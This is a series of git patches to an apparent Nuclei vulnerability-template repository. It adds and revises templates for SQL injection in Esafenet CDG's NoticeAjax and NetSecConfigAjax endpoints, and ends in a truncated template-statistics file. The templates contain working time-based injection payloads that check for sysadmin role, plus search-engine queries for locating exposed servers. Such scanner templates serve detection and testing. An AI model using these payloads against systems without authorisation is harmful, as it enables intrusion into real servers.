'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7449ea94b86a10c7db1a6f157d7cf4690f3c9d0145eea577554bf1199f76cbf022100afe6d02eeb064d29c13d58c887c1ebd4a95ad737dbde18a9a89a00edcf7fa427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index fcee5e1f1a..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100adfc1ee84a13f8af0b8751c0c1b2b9ccbbb8e5f34e71376d7590f38286ce611f022100dc879b139684539aa18b641881d05673e1617de198e776a2557a067ad904381d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b3af2e9525..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047bd2c1e9190eba585550f7e7923a5c4465d601deeee6985aa5fe393834d433f0220084ef4c1d80a909809310dee02c45a291b8085a05e68156efa36c5170e10a347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5614320187..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090000efc65f8f70d339ccb119b0936996ee15b23c51e805662aba28ca56439fa022100e3dcc0ebc74fe3eaa2539c56bdda80b0f14420c18e39c50b7764a9d2b8e39a09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 792fb15896..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033e248f197a7bf7d30a3400b0fa846a229dd824dee529409ac181cdead3ee2f8022100f268b69253633c6051e31fed38270a5febc42180ba04a054f22b28d4100c8aff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f81a3f8dd2a90490e3835ef9a400bf79005e39fb Mon Sep 17 00:00:00 2001 From: r00t <24542600+adeljck@users.noreply.github.com> Date: Wed, 24 Jul 2024 13:39:18 +0800 Subject: [PATCH 1665/1841] Add esafenet-NoticeAjax-Sqli.yaml --- .../esafenet/esafenet-NoticeAjax-Sqli.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/vulnerabilities/esafenet/esafenet-NoticeAjax-Sqli.yaml diff --git a/http/vulnerabilities/esafenet/esafenet-NoticeAjax-Sqli.yaml b/http/vulnerabilities/esafenet/esafenet-NoticeAjax-Sqli.yaml new file mode 100644 index 0000000000..7defc12bf9 --- /dev/null +++ b/http/vulnerabilities/esafenet/esafenet-NoticeAjax-Sqli.yaml @@ -0,0 +1,32 @@ +id: esafenet-NoticeAjax-Sqli + +info: + name: Esafenet CDG NoticeAjax - Sql Injection + author: adeljck + severity: high + description: | + CDGServer3 NoticeAjax Interface Sql Injection. + metadata: + verified: true + max-request: 1 + fofa-query: title="电子文档安全管理系统",body="CDGServer3/" + hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/" + product: electronic_document_security_management_system + vendor: esafenet + tags: esafenet,sqli + +http: + - raw: + - | + POST /CDGServer3/NoticeAjax;Service HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36 + + command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- + max-size: 1000 + matchers-condition: and + matchers: + - type: status + status: + - 200 From 3ddc1b49fc71c80f2dbfbda84804e33924d4cb17 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 24 Jul 2024 20:11:23 +0530 Subject: [PATCH 1666/1841] Update and rename esafenet-NoticeAjax-Sqli.yaml to esafenet-noticeajax-sqli.yaml --- ...qli.yaml => esafenet-noticeajax-sqli.yaml} | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) rename http/vulnerabilities/esafenet/{esafenet-NoticeAjax-Sqli.yaml => esafenet-noticeajax-sqli.yaml} (57%) diff --git a/http/vulnerabilities/esafenet/esafenet-NoticeAjax-Sqli.yaml b/http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml similarity index 57% rename from http/vulnerabilities/esafenet/esafenet-NoticeAjax-Sqli.yaml rename to http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml index 7defc12bf9..0b4294344e 100644 --- a/http/vulnerabilities/esafenet/esafenet-NoticeAjax-Sqli.yaml +++ b/http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml @@ -1,4 +1,4 @@ -id: esafenet-NoticeAjax-Sqli +id: esafenet-noticeajax-sqli info: name: Esafenet CDG NoticeAjax - Sql Injection @@ -18,15 +18,18 @@ info: http: - raw: - | + @timeout: 10s POST /CDGServer3/NoticeAjax;Service HTTP/1.1 Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36 - command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- - max-size: 1000 - matchers-condition: and + command=delNotice¬iceId=123';if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'-- + matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(content_type,"text/xml")' + - 'contains(body,"OK")' + - 'status_code == 200' + condition: and From 548c10c72094bedb56ef17e7bda533c3f6a0da05 Mon Sep 17 00:00:00 2001 From: r00t <24542600+adeljck@users.noreply.github.com> Date: Wed, 24 Jul 2024 13:44:57 +0800 Subject: [PATCH 1667/1841] add esafenet-NetSecConfigAjax-Sqli.yaml --- .../esafenet-NetSecConfigAjax-Sqli.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml diff --git a/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml new file mode 100644 index 0000000000..0cc869b83a --- /dev/null +++ b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml @@ -0,0 +1,38 @@ +id: esafenet-NetSecConfigAjax-Sqli + +info: + name: Esafenet CDG NetSecConfigAjax - Sql Injection + author: adeljck + severity: high + description: | + CDGServer3 NetSecConfigAjax Interface Sql Injection. + metadata: + verified: true + max-request: 1 + fofa-query: title="电子文档安全管理系统",body="CDGServer3/" + hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/" + product: electronic_document_security_management_system + vendor: esafenet + tags: esafenet,sqli + +http: + - raw: + - | + POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36 + + command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- + max-size: 1000 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "操作成功" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 9ecee1206badf970292a912b92b04c1542c13dd1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 24 Jul 2024 16:43:23 +0530 Subject: [PATCH 1668/1841] Update and rename esafenet-NetSecConfigAjax-Sqli.yaml to esafenet-netsecconfigajax-sqli.yaml --- .../esafenet-NetSecConfigAjax-Sqli.yaml | 38 ------------------- .../esafenet-netsecconfigajax-sqli.yaml | 31 +++++++++++++++ 2 files changed, 31 insertions(+), 38 deletions(-) delete mode 100644 http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml create mode 100644 http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml diff --git a/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml deleted file mode 100644 index 0cc869b83a..0000000000 --- a/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: esafenet-NetSecConfigAjax-Sqli - -info: - name: Esafenet CDG NetSecConfigAjax - Sql Injection - author: adeljck - severity: high - description: | - CDGServer3 NetSecConfigAjax Interface Sql Injection. - metadata: - verified: true - max-request: 1 - fofa-query: title="电子文档安全管理系统",body="CDGServer3/" - hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/" - product: electronic_document_security_management_system - vendor: esafenet - tags: esafenet,sqli - -http: - - raw: - - | - POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36 - - command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- - max-size: 1000 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "操作成功" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml new file mode 100644 index 0000000000..ed12954a22 --- /dev/null +++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml @@ -0,0 +1,31 @@ +id: esafenet-netsecconfigajax-sqli + +info: + name: Esafenet CDG NetSecConfigAjax - Sql Injection + author: adeljck + severity: high + description: | + The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions. + metadata: + verified: true + vendor: esafenet + max-request: 1 + fofa-query: title="电子文档安全管理系统",body="CDGServer3/" + tags: esafenet,sqli + +http: + - raw: + - | + POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- + + matchers: + - type: dsl + dsl: + - 'contains(content_type,"text/html")' + - 'contains(body,"操作成功")' + - 'status_code == 200' + condition: and From 7cbcdb15079bf4d922cfbac1664d03c93e835a32 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 24 Jul 2024 16:46:08 +0530 Subject: [PATCH 1669/1841] Update esafenet-netsecconfigajax-sqli.yaml --- .../esafenet/esafenet-netsecconfigajax-sqli.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml index ed12954a22..6d9097fe21 100644 --- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml +++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml @@ -15,12 +15,12 @@ info: http: - raw: - - | - POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + - | + POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- + command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- matchers: - type: dsl From 34e9fdd7cf800c17a95162a1ffd450057cbd0f98 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 07:36:10 +0000 Subject: [PATCH 1670/1841] Auto Generated Templates Stats [Fri Jul 26 07:36:10 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 11149 +++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 5604 insertions(+), 5567 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 4fe4a5c5e4..b7b857fd1f 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2571},{"name":"panel","count":1167},{"name":"wordpress","count":1002},{"name":"exposure","count":968},{"name":"xss","count":917},{"name":"wp-plugin","count":872},{"name":"osint","count":804},{"name":"tech","count":698},{"name":"lfi","count":678},{"name":"misconfig","count":673},{"name":"rce","count":616},{"name":"edb","count":597},{"name":"packetstorm","count":546},{"name":"wpscan","count":506},{"name":"cve2021","count":493},{"name":"cve2022","count":472},{"name":"wp","count":435},{"name":"cve2023","count":393},{"name":"sqli","count":370},{"name":"unauth","count":370},{"name":"file","count":345},{"name":"authenticated","count":344},{"name":"detect","count":313},{"name":"intrusive","count":312},{"name":"login","count":299},{"name":"kev","count":277},{"name":"cve2020","count":256},{"name":"token-spray","count":243},{"name":"config","count":224},{"name":"oast","count":223},{"name":"top-200","count":222},{"name":"default-login","count":222},{"name":"devops","count":212},{"name":"osint-social","count":210},{"name":"malware","count":209},{"name":"apache","count":198},{"name":"network","count":197},{"name":"token","count":194},{"name":"","count":191},{"name":"cve2018","count":170},{"name":"cloud","count":169},{"name":"iot","count":167},{"name":"cve2019","count":163},{"name":"keys","count":156},{"name":"install","count":151},{"name":"joomla","count":148},{"name":"redirect","count":138},{"name":"tcp","count":137},{"name":"aws","count":135},{"name":"cve2024","count":134},{"name":"auth-bypass","count":133},{"name":"ssrf","count":120},{"name":"amazon","count":118},{"name":"phishing","count":117},{"name":"cms","count":115},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":91},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"takeover","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":74},{"name":"kubernetes","count":71},{"name":"oss","count":69},{"name":"js","count":68},{"name":"cisco","count":67},{"name":"enum","count":65},{"name":"adobe","count":64},{"name":"k8s","count":62},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"detection","count":57},{"name":"cve2016","count":57},{"name":"google","count":56},{"name":"vmware","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"php","count":45},{"name":"aem","count":45},{"name":"generic","count":45},{"name":"osint-gaming","count":45},{"name":"debug","count":44},{"name":"cve2014","count":44},{"name":"deserialization","count":44},{"name":"jndi","count":44},{"name":"cnvd","count":43},{"name":"traversal","count":43},{"name":"osint-hobby","count":42},{"name":"oa","count":42},{"name":"osint-porn","count":42},{"name":"microsoft","count":42},{"name":"plugin","count":42},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"injection","count":39},{"name":"listing","count":38},{"name":"miscellaneous","count":38},{"name":"jira","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"k8s-cluster-security","count":34},{"name":"sap","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"devsecops","count":32},{"name":"dlink","count":32},{"name":"tls","count":32},{"name":"osint-tech","count":31},{"name":"ec2","count":30},{"name":"wp-theme","count":30},{"name":"osint-coding","count":30},{"name":"gitlab","count":28},{"name":"api","count":28},{"name":"fortinet","count":28},{"name":"lfr","count":27},{"name":"file-upload","count":27},{"name":"citrix","count":27},{"name":"dns","count":27},{"name":"proxy","count":27},{"name":"bestwebsoft","count":27},{"name":"admin","count":26},{"name":"manageengine","count":26},{"name":"zohocorp","count":26},{"name":"cve2012","count":26},{"name":"ssh","count":26},{"name":"firewall","count":26},{"name":"weaver","count":25},{"name":"dast","count":25},{"name":"zoho","count":25},{"name":"xxe","count":25},{"name":"osint-shopping","count":24},{"name":"osint-images","count":24},{"name":"printer","count":24},{"name":"osint-business","count":24},{"name":"osint-finance","count":24},{"name":"yonyou","count":23},{"name":"stored-xss","count":23},{"name":"tomcat","count":23},{"name":"audit","count":23},{"name":"s3","count":22},{"name":"github","count":22},{"name":"cicd","count":22},{"name":"prestashop","count":22},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"camera","count":20},{"name":"ftp","count":20},{"name":"info-leak","count":20},{"name":"jenkins","count":20},{"name":"wavlink","count":20},{"name":"vpn","count":19},{"name":"hp","count":19},{"name":"apt","count":19},{"name":"struts","count":19},{"name":"grafana","count":19},{"name":"rukovoditel","count":19},{"name":"confluence","count":19},{"name":"node.js","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"android","count":18},{"name":"backdoor","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"nginx","count":17},{"name":"headless","count":17},{"name":"microweber","count":17},{"name":"magento","count":17},{"name":"honeypot","count":17},{"name":"backup","count":17},{"name":"zyxel","count":17},{"name":"azure","count":17},{"name":"mail","count":17},{"name":"ssti","count":16},{"name":"cve2009","count":16},{"name":"bypass","count":16},{"name":"service","count":16},{"name":"dashboard","count":16},{"name":"jarm","count":16},{"name":"rconfig","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"osint-blog","count":16},{"name":"netgear","count":15},{"name":"seeyon","count":15},{"name":"moosocial","count":15},{"name":"ruby","count":15},{"name":"woocommerce","count":15},{"name":"cve2013","count":15},{"name":"ivanti","count":15},{"name":"xwiki","count":15},{"name":"installer","count":15},{"name":"redhat","count":15},{"name":"setup","count":15},{"name":"docker","count":15},{"name":"tongda","count":15},{"name":"cve2008","count":15},{"name":"java","count":15},{"name":"nagios","count":15},{"name":"cnvd2021","count":15},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"nodejs","count":14},{"name":"npm","count":14},{"name":"osint-health","count":14},{"name":"node","count":14},{"name":"smtp","count":14},{"name":"rds","count":14},{"name":"osint-art","count":14},{"name":"jboss","count":14},{"name":"login-check","count":14},{"name":"git","count":14},{"name":"dell","count":14},{"name":"icewarp","count":14},{"name":"domainmod","count":14},{"name":"windows","count":13},{"name":"airflow","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"rails","count":13},{"name":"auth","count":13},{"name":"graphql","count":13},{"name":"osint-dating","count":13},{"name":"sonicwall","count":13},{"name":"abstractapi","count":13},{"name":"kafka","count":13},{"name":"fuzzing","count":13},{"name":"laravel","count":13},{"name":"fortigate","count":13},{"name":"cuppa","count":13},{"name":"hashicorp","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"webserver","count":12},{"name":"drupal","count":12},{"name":"newrelic","count":12},{"name":"vbulletin","count":12},{"name":"deployments","count":12},{"name":"jetbrains","count":12},{"name":"smb","count":12},{"name":"netsweeper","count":12},{"name":"phpgurukul","count":12},{"name":"cache","count":12},{"name":"zimbra","count":12},{"name":"spring","count":12},{"name":"doppler","count":12},{"name":"ofbiz","count":12},{"name":"osint-video","count":11},{"name":"xstream","count":11},{"name":"prometheus","count":11},{"name":"dedecms","count":11},{"name":"iam","count":11},{"name":"hikvision","count":11},{"name":"glpi","count":11},{"name":"django","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"fastjson","count":11},{"name":"solr","count":10},{"name":"digitalocean","count":10},{"name":"crlf","count":10},{"name":"elasticsearch","count":10},{"name":"samsung","count":10},{"name":"phpmyadmin","count":10},{"name":"sitecore","count":10},{"name":"dahua","count":10},{"name":"zabbix","count":10},{"name":"instrusive","count":10},{"name":"blind","count":10},{"name":"thinkphp","count":10},{"name":"db","count":10},{"name":"symfony","count":10},{"name":"progress","count":10},{"name":"xstream_project","count":10},{"name":"solarview","count":10},{"name":"dropbox","count":10},{"name":"firebase","count":9},{"name":"console","count":9},{"name":"versa","count":9},{"name":"vcenter","count":9},{"name":"exchange","count":9},{"name":"joomla\\!","count":9},{"name":"wso2","count":9},{"name":"sophos","count":9},{"name":"gitea","count":9},{"name":"opencats","count":9},{"name":"pfsense","count":9},{"name":"python","count":9},{"name":"elastic","count":9},{"name":"cnvd2020","count":9},{"name":"kube","count":9},{"name":"cloudtrail","count":9},{"name":"druid","count":9},{"name":"sangfor","count":9},{"name":"artica","count":9},{"name":"secret","count":9},{"name":"gateway","count":9},{"name":"f5","count":9},{"name":"lucee","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"facebook","count":9},{"name":"moodle","count":9},{"name":"lfprojects","count":8},{"name":"microfocus","count":8},{"name":"cacti","count":8},{"name":"oauth","count":8},{"name":"huawei","count":8},{"name":"symantec","count":8},{"name":"atom","count":8},{"name":"odoo","count":8},{"name":"solarwinds","count":8},{"name":"config-audit","count":8},{"name":"spotweb_project","count":8},{"name":"mirai","count":8},{"name":"spotweb","count":8},{"name":"e-office","count":8},{"name":"wanhu","count":8},{"name":"bucket","count":8},{"name":"nexus","count":8},{"name":"nagiosxi","count":8},{"name":"cloud-enum","count":8},{"name":"go","count":8},{"name":"manager","count":8},{"name":"phpjabbers","count":8},{"name":"metadata","count":8},{"name":"ognl","count":8},{"name":"recon","count":8},{"name":"mlflow","count":8},{"name":"hms","count":8},{"name":"discord","count":8},{"name":"phpinfo","count":8},{"name":"unauthenticated","count":8},{"name":"ldap","count":8},{"name":"openemr","count":8},{"name":"default-page","count":8},{"name":"osint-news","count":8},{"name":"cisco-switch","count":8},{"name":"emerge","count":8},{"name":"vrealize","count":7},{"name":"nortekcontrol","count":7},{"name":"vpc","count":7},{"name":"keking","count":7},{"name":"squirrelmail","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"fortios","count":7},{"name":"oos","count":7},{"name":"websphere","count":7},{"name":"nacos","count":7},{"name":"gradio","count":7},{"name":"mobileiron","count":7},{"name":"slack","count":7},{"name":"bloofox","count":7},{"name":"blockchain","count":7},{"name":"telesquare","count":7},{"name":"linkedin","count":7},{"name":"exploitdb","count":7},{"name":"activemq","count":7},{"name":"fpd","count":7},{"name":"gogs","count":7},{"name":"pmb","count":7},{"name":"geoserver","count":7},{"name":"maps","count":7},{"name":"teamcity","count":7},{"name":"bigip","count":7},{"name":"opensis","count":7},{"name":"rfi","count":7},{"name":"vms","count":7},{"name":"twitter","count":7},{"name":"moodating","count":7},{"name":"shopify","count":7},{"name":"avtech","count":7},{"name":"splunk","count":7},{"name":"pods","count":7},{"name":"filemanager","count":7},{"name":"mongodb","count":7},{"name":"monstra","count":7},{"name":"contec","count":7},{"name":"landray","count":7},{"name":"error","count":7},{"name":"database","count":7},{"name":"ruckus","count":7},{"name":"flutterwave","count":6},{"name":"synacor","count":6},{"name":"keycloak","count":6},{"name":"paloaltonetworks","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"couchdb","count":6},{"name":"rat","count":6},{"name":"express","count":6},{"name":"cnvd2023","count":6},{"name":"jamf","count":6},{"name":"security","count":6},{"name":"liferay","count":6},{"name":"asp","count":6},{"name":"bmc","count":6},{"name":"servicenow","count":6},{"name":"cockpit","count":6},{"name":"openvpn","count":6},{"name":"kubelet","count":6},{"name":"jetty","count":6},{"name":"74cms","count":6},{"name":"tikiwiki","count":6},{"name":"paypal","count":6},{"name":"microstrategy","count":6},{"name":"leak","count":6},{"name":"webmin","count":6},{"name":"cobbler","count":6},{"name":"zhiyuan","count":6},{"name":"minio","count":6},{"name":"chanjet","count":6},{"name":"online-fire-reporting","count":6},{"name":"server","count":6},{"name":"plesk","count":6},{"name":"gcp","count":6},{"name":"doctor-appointment-system","count":6},{"name":"mikrotik","count":6},{"name":"sonarqube","count":6},{"name":"log","count":6},{"name":"elfinder","count":6},{"name":"jeecg","count":6},{"name":"magmi","count":6},{"name":"beyondtrust","count":6},{"name":"advantech","count":6},{"name":"asus","count":6},{"name":"sql","count":6},{"name":"online_fire_reporting_system_project","count":6},{"name":"typo3","count":6},{"name":"graylog","count":5},{"name":"metinfo","count":5},{"name":"goanywhere","count":5},{"name":"hybris","count":5},{"name":"circarlife","count":5},{"name":"mssql","count":5},{"name":"resin","count":5},{"name":"openai","count":5},{"name":"kkfileview","count":5},{"name":"h3c","count":5},{"name":"tibco","count":5},{"name":"circontrol","count":5},{"name":"avaya","count":5},{"name":"wpdevart","count":5},{"name":"10web","count":5},{"name":"ems","count":5},{"name":"storage","count":5},{"name":"webkul","count":5},{"name":"web3","count":5},{"name":"zzzcms","count":5},{"name":"react","count":5},{"name":"qdpm","count":5},{"name":"apisix","count":5},{"name":"jupyter","count":5},{"name":"ethereum","count":5},{"name":"avideo","count":5},{"name":"glpi-project","count":5},{"name":"caucho","count":5},{"name":"sysaid","count":5},{"name":"etcd","count":5},{"name":"magmi_project","count":5},{"name":"openfire","count":5},{"name":"openstack","count":5},{"name":"password","count":5},{"name":"http","count":5},{"name":"cve2007","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"firmware","count":5},{"name":"craftcms","count":5},{"name":"froxlor","count":5},{"name":"hoteldruid","count":5},{"name":"totolink","count":5},{"name":"qnap","count":5},{"name":"cdata","count":5},{"name":"percha","count":5},{"name":"asana","count":5},{"name":"schneider-electric","count":5},{"name":"checkpoint","count":5},{"name":"open-emr","count":5},{"name":"carrental","count":5},{"name":"mantisbt","count":5},{"name":"parallels","count":5},{"name":"spark","count":5},{"name":"adminer","count":5},{"name":"connectwise","count":5},{"name":"swagger","count":5},{"name":"api-server","count":5},{"name":"apollo","count":5},{"name":"wbce","count":5},{"name":"elementor","count":5},{"name":"thedigitalcraft","count":5},{"name":"telerik","count":5},{"name":"gnu","count":5},{"name":"learnpress","count":5},{"name":"square","count":5},{"name":"terramaster","count":5},{"name":"rseenet","count":5},{"name":"blackenergy","count":5},{"name":"redmine","count":5},{"name":"gocd","count":5},{"name":"nuuo","count":5},{"name":"axigen","count":5},{"name":"fatpipe","count":5},{"name":"pyload","count":5},{"name":"awstats","count":5},{"name":"acm","count":5},{"name":"digitaldruid","count":5},{"name":"jwt","count":5},{"name":"tenda","count":5},{"name":"akamai","count":5},{"name":"xmlrpc","count":5},{"name":"strapi","count":5},{"name":"agentejo","count":5},{"name":"decision-center","count":5},{"name":"voip","count":5},{"name":"papercut","count":5},{"name":"matrix","count":5},{"name":"sftp","count":5},{"name":"dionaea","count":5},{"name":"chamilo","count":5},{"name":"crushftp","count":5},{"name":"webview","count":5},{"name":"adb","count":5},{"name":"sentry","count":5},{"name":"genetechsolutions","count":5},{"name":"cloudflare","count":5},{"name":"hpe","count":5},{"name":"jabber","count":5},{"name":"mostra","count":4},{"name":"os4ed","count":4},{"name":"grav","count":4},{"name":"umbraco","count":4},{"name":"dom","count":4},{"name":"churchcrm","count":4},{"name":"horde","count":4},{"name":"salesforce","count":4},{"name":"mostracms","count":4},{"name":"nosqli","count":4},{"name":"igniterealtime","count":4},{"name":"hongfan","count":4},{"name":"thimpress","count":4},{"name":"artifactory","count":4},{"name":"sound4","count":4},{"name":"thinkcmf","count":4},{"name":"httpserver","count":4},{"name":"jfrog","count":4},{"name":"veronalabs","count":4},{"name":"aura","count":4},{"name":"mautic","count":4},{"name":"figma","count":4},{"name":"jellyfin","count":4},{"name":"owncloud","count":4},{"name":"osgeo","count":4},{"name":"opencms","count":4},{"name":"sendgrid","count":4},{"name":"kyocera","count":4},{"name":"ransomware","count":4},{"name":"mitel","count":4},{"name":"mcafee","count":4},{"name":"harbor","count":4},{"name":"pega","count":4},{"name":"creativeitem","count":4},{"name":"candidats","count":4},{"name":"imgproxy","count":4},{"name":"gnuboard","count":4},{"name":"zend","count":4},{"name":"mailchimp","count":4},{"name":"jorani","count":4},{"name":"powerjob","count":4},{"name":"ghost","count":4},{"name":"proftpd","count":4},{"name":"springcloud","count":4},{"name":"globalprotect","count":4},{"name":"postmessage","count":4},{"name":"concrete","count":4},{"name":"heroku","count"